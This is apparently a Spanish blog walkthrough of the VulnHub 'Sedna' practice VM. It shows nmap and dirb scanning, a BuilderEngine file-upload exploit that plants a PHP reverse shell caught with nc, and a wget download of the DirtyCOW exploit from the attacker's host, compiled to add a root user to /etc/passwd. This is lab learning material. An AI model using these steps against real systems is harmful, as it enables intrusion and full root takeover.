\   /\          __    _____        _____     _____ _ _____
)  ( ')        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
(  /  )        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
 \(__)|        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|

 
 Hoy es el turno de Sedna!!
Esta vm la podeis descargar de: https://download.vulnhub.com/hackfest2016/Sedna.ova

Y ya que la tenemos descargada vamos alla!
Lo primero es arrancar nuestra VM con Kali y la VM de Sedna.
Al arrancar Sedna veo la siguiente pantalla:

Smiley face

Ahora es turno de nmap, para ello ejecuto:

nmap -A -p- 192.168.88.162
Y nos da como resultado los siguientes puertos: Smiley face Smiley face Despues de mirar el puerto 8080 (Tomcat) y tirarme un tiempo decido dejarlo de lado, e ir a por el puerto 80 para ver que tiene. Hago un dirb para ver que nos encontramos por ahi:
dirb http://192.168.88.162 /usr/share/wordlists/dirb/small.txt
Smiley face El resultado de dirb muestra que hay varias carpetas que puede que sean interesantes, si accedo a la de "modules"... Smiley face Vale, despues de explorar un poco encuentro un fichero, el tipico license.txt asi que lo miro para ver que tipo de software esta en esas carpetas, y tal y como pone en el license.txt es BUILDERENGINE! Smiley face Pues eso, a buscar si hay algun exploit publico para BuilderEngine y veo que en exploit-db tenemos uno. Smiley face Sigo los pasos que aparecen en la web, asi que creo un fichero .html con el contenido de la imagen: Smiley face Y lo guardo en /var/www/html para acceder a el desde mi navegador. Para acceder a el me aseguro que tengo Nginx ejecutandose y vamos: Smiley face Vale, hay que darle a browse, seleccionar alguna webshell php que tengamos y luego darle a enviar. Como webshell uso la de http://pentestmonkey.net/tools/web-shells/php-reverse-shell Es una "Reverse shell" asi que modifico la IP, para que la "victima" sea quien se conecte a mi pc, que estara esperando la conexion con NC. Ejecuto nc en mi maquina:
nc -nlvp 1234
Visito http://victima/files/shell.php tal y como aparece en la web de exploit-db, y.... Smiley face En /var/www encuentro una de las flags: Smiley face Y por ultimo despues de ver que es un Ubuntu y ver que puedo conseguir root ejecutando algun exploit de dirty cow, pues uso el de https://www.exploit-db.com/exploits/40839/ Para ello lo pongo en /var/Www/html de mi Kali, y desde la shell que tengo en la victima ejecuto:
wget http://192.168.88.161/40839.c
Despues en la shell de la victima compilo el exploit:
gcc -pthread -o yeah 40839.c -lcrypt
Smiley face Lo ejecutamos y vemos que nos pide una password, en este caso pongo "lalita" y lineas mas abajo aparece que se ha agregado la linea firefart.... al /etc/passwd Vale, parece que ha funcionado y se ha creado al usuario firefart con mi contraseņa "lalita"... Para probarlo conecto a traves de ssh a la victima con:
ssh -l firefart 192.168.88.162
Y... Smiley face Ya soy root :) Por ultimo miro la flag... Smiley face